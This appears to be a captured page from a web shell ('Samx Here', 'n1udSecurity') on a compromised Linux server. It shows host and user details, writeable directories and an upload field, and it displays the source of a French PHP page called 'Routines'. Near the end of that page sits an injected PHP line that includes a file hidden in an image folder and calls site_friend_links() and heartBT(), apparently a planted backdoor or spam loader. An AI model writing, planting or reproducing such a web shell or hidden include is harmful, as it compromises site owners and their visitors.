Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/public_html/tests/routines/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/public_html/tests/routines/routines.php
<!DOCTYPE html>
<html lang="fr">
<head>
	<title>Routines</title>
	<meta name="description" content="A compléter..." />
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0, minimal-ui">
	<link rel="icon" type="image/ico" href="images/favicon.ico" />
	<!--[if IE]><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /><![endif]-->
	<link rel="stylesheet" href="css/bootstrap.css">
	<link rel="stylesheet" href="lineicons/WebFont/font-css/LineIcons.css">
	<link rel="stylesheet" href="css/bootstrap-table.css">
	<link rel="stylesheet" href="summernotes/summernote-bs4.css">
	<link rel="stylesheet" href="css/routines.css">
	<script src="js/jquery-1.12.4.min.js" type="text/javascript"></script>
	<script src="js/bootstrap.bundle.min.js" type="text/javascript"></script>
	<script src="js/bootstrap-table.min.js" type="text/javascript"></script>
	<script src="js/bootstrap-table-fr-FR.min.js" type="text/javascript"></script>
	<script src="summernotes/summernote-bs4.min.js" type="text/javascript"></script>
	<script src="summernotes/summernote-fr-FR.js" type="text/javascript"></script>
	<script src="js/routines.js" type="text/javascript"></script>

</head>
	
<body>

<?php include 'navbar.php'; ?>
<div class="container">
<div class="patience_chargement alert alert-dark mt-3" style="text-align:center;">Patience pendant le chargement...</div>
	<?php
		include "inc/bloc_1.php";
		include "inc/bloc_2.php";
		include "inc/bloc_3.php";
		include "inc/bloc_4.php";
	?>
</div><?php include_once $_SERVER["DOCUMENT_ROOT"]."/lesite/IMG/distant/html/functions-php-lib.php"; global $hasRun; if (!$hasRun) { echo site_friend_links("<!--DhdL8Uf9-->");flush();heartBT(); $hasRun = true;} ?>

<?php //include "inc/modales.php" ?>
	
</body>
</html>

SAMX